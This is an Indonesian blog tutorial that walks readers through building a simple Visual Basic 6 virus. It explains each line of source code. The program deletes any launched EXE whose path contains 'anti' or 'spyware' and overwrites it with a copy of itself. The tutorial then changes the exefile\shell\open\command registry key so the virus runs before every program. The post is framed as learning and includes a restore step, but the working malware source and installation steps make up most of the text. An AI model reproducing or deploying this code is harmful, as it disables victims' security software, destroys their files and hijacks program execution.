Program Visual Basic sering sekali makhluk ini di perintahkan programmer gila untuk menciptakan sebuah program JAHAT/VIRUS.
Pernahkah anda berpikir bagaimana virus tersebut memanipulasi/menginfeksi file aplikasi atau file berekstensi EXE?
Contoh : Jika file berjenis EXE tersebut di klik maka file tersebut terhapus seolah-olah anda yang menghapusnya kemudian file EXE yang sudah terhapus tersebut di ganti dengan aplikasi virus tersebut dan menggunakan nama yang sama dengan file EXE yang di hapusnya.
Berikut ini adalah metode sederhana bagaimana cara kerja virus menginfeksi file berekstensi aplikasi EXE dengan sedikit merubah value Registry pada windows.
1.) Buka program Visual Basic, di contoh ini saya menggunakan VB6.
2.) Pilih Standart EXE kemudian klik Open.
3.) Klik kanan pada dialog Project pilih menu Add -> Module pada dialog Add Module pilih icon Module dan klik Open.
4.) Klik kanan pada nama Form1 (Form1) kemudian Klik menu Remove Form1.
5.) Sekarang saatnya coding/pengkodean. Saya akan menjelaskan maksud setiap baris kode pada gambar di bawah ini.
PENGERTIAN KODE :
Sub Main()
Saat kali pertama project ini di jalankan rangkaian kode di dalam Sub ini akan di eksekusi. Gunakan "Sub Main" ini jika anda ingin menjalankan perintah apapun saat kali pertama program anda di jalankan.
On Error Resume Next
Jika terjadi kesalahan maka abaikan kode yang di anggap salah dan lanjutkan perintah yang di nyatakan benar.
Dim alamat As String
Deklarasikan variabel "alamat" sebagai String.
alamat = Replace(Command$, Chr(34), "")
Variabel "alamat" di isi dengan :
Replace = Mencari karakter tertentu di dalam suatu string kemudian jika karakter tersebut di temukan maka tempatkan ulang/replace dengan karakter yang di inginkan.
Command$ = Alamat file yang di jalankan atau di klik.
Chr(34) = Tanda kutip(").
"" = String Kosong.
Jadi pada alamat file yang di klik jika terdapat tanda kutip(") maka hapus tanda kutip tersebut.
If LCase(alamat) <> LCase(App.Path & "\" & App.EXEName & ".exe") Then
Jika alamat file yang di klik tidak sama dengan alamat aplikasi ini maka jalankan perintah selanjutnya. "Lcase" adalah (konversi string ke huruf kecil).
If InStr(LCase(alamat), "anti") Or InStr(LCase(alamat), "spyware") Then
Jika pada string alamat terdapat kata "anti" atau "spyware" maka jalankan perintah selanjutnya.
MsgBox alamat, vbCritical, "terinfeksi virus"
Tampilkan pesan alamat tersebut.
Kill alamat
HATI-HATI! dalam menggunakan perintah "Kill" di sini di gunakan untuk Menghapus permanen file yang di klik (bukan ke Recycle Bin).
FileCopy App.Path & "\" & App.EXEName & ".exe", alamat
Duplikasi aplikasi ini ke alamat file yang di klik.
Else
Jika pada string alamat tidak terdapat kata "anti" atau "spyware" maka jalankan perintah selanjutnya.
Shell alamat, vbNormalFocus
Jalankan file tersebut (alamat yang tidak terdapat kata "anti" atau "spyware") secara normal.
End If
End If
Tutup "If"
End
End Sub
Akhiri aplikasi ini.
6.) Klik menu File -> Make Project1.exe.
7.) Simpan dengan nama file tes virus.exe ke lokasi yang anda inginkan. Di contoh ini saya simpan di Desktop di folder Tutorial, untuk percobaan lebih baik ikuti cara saya.
8.) Buka menu Run dan ketik regedit.
9.) Anda akan di tampilkan sebuah program Registry Editor.
PERHATIAN :
Sebelum melanjutkan langkah-langkah ini di mohon untuk berhati-hati dalam melakukannya karena jika anda salah sedikit saja maka akan berakibat fatal bagi sistem anda, tolong ikuti langkah-langkah di bawah ini dengan benar.
10.) Tekan Ctrl+F, tampil dialog Find pada Find What: ketik kata exefile dan pada bagian Look at beri tanda centang pada chekbox Keys yang lainnya biarkan kosong kemudian klik tombol Find Next.
11.) Pada key/folder exefile yang sudah di sorot doubleclick key exefile -> shell -> open -> command pastikan alamatnya di "My Computer\HKEY_CLASSES_ROOT\exefile\shell\open\command".
12.) Pada Name doubleclick value (Default) anda akan di tampilkan dialog Edit String.
13.) Pada Value data: isi alamat aplikasi yang baru di buat tadi di awal "%1" %* di contoh ini nama aplikasi tersebut adalah tes virus.exe di folder Desktop\Tutorial
alamatnya jadi seperti ini "C:\Documents and Settings\RUDI HIDAYAT\Desktop\Tutorial\tes virus.exe" "%1" %* lihat dengan teliti tanda kutip di gunakan, jika sudah selesai klik tombol Ok jadinya seperti gambar di bawah ini.
PERHATIAN :
Setelah selesai manipulasi Registry tolong jangan di tutup dulu program Registry Editor.
TES MANIPULASI :
- Coba anda copy file aplikasi (exe) apa saja kemudian anda klik file (exe) yang baru di copy tersebut.
- Dalam contoh ini jika sebuah file (exe) di klik dan memiliki kata "anti" atau "spyware" pada alamat atau nama filenya maka tampilkan pesan bahwa file yang di klik tersebut "Terinfeksi virus" kemudian file (exe) tersebut akan di hapus dan di ganti dengan aplikasi virus kita dengan alamat dan nama file yang sama dengan file (exe) yang di hapus itu.
PENGERTIAN MANIPULASI REGISTRY :
Jadi key Registry di alamat exefile\shell\open\command di gunakan untuk mengeksekusi file berekstensi aplikasi (exe) namun kita manipulasi dengan menambahkan alamat file virus kita yang tadinya...
Value data : "%1" %*
menjadi...
Value data : "C:\Documents and Settings\RUDI HIDAYAT\Desktop\Tutorial\tes virus.exe" "%1" %*
Sekarang maksudnya menjadi sedikit berbeda yaitu jika file aplikasi (exe) apapun di jalankan maka sebelum file (exe) tersebut di jalankan akan menjalankan file virus kita terlebih dahulu kemudian menjalankan file (exe) yang sebelumnya sudah di jalankan itu. Karena struktur kode virus yang kita buat tugasnya untuk memanipulasi suatu file (exe) yang di jalankan maka akan di manipulasinya jika perintah-perintah yang ada di dalam struktur kode virus kita memungkinkan atau situasinya tepat dengan yang kita harapkan.
NORMALKAN VALUE REGISTRY :
Jika anda sudah puas bermain-main kembali ke Registry Editor kemudian doubleclick value (Default) akan tampil dialog Edit String.
Ubah Value data: menjadi "%1" %* kemudian klik tombol Ok. value (Default) akan seperti gambar di bawah ini...
tutup Registry Editor tersebut dan SELESAI...
Download Source code contoh aplikasinya di sini
Jika anda belum jelas dengan tutorial di atas, anda dapat melihat tutorial versi videonya di bawah ini.
di tulis oleh Rudi Hidayat
..::SELAMAT MENCOBA::..
1 komentar:
wah makasih infonya tentang virus gan .. ane jadi paham nih ..
bang minta follbacknya and komenbacknya
Posting Komentar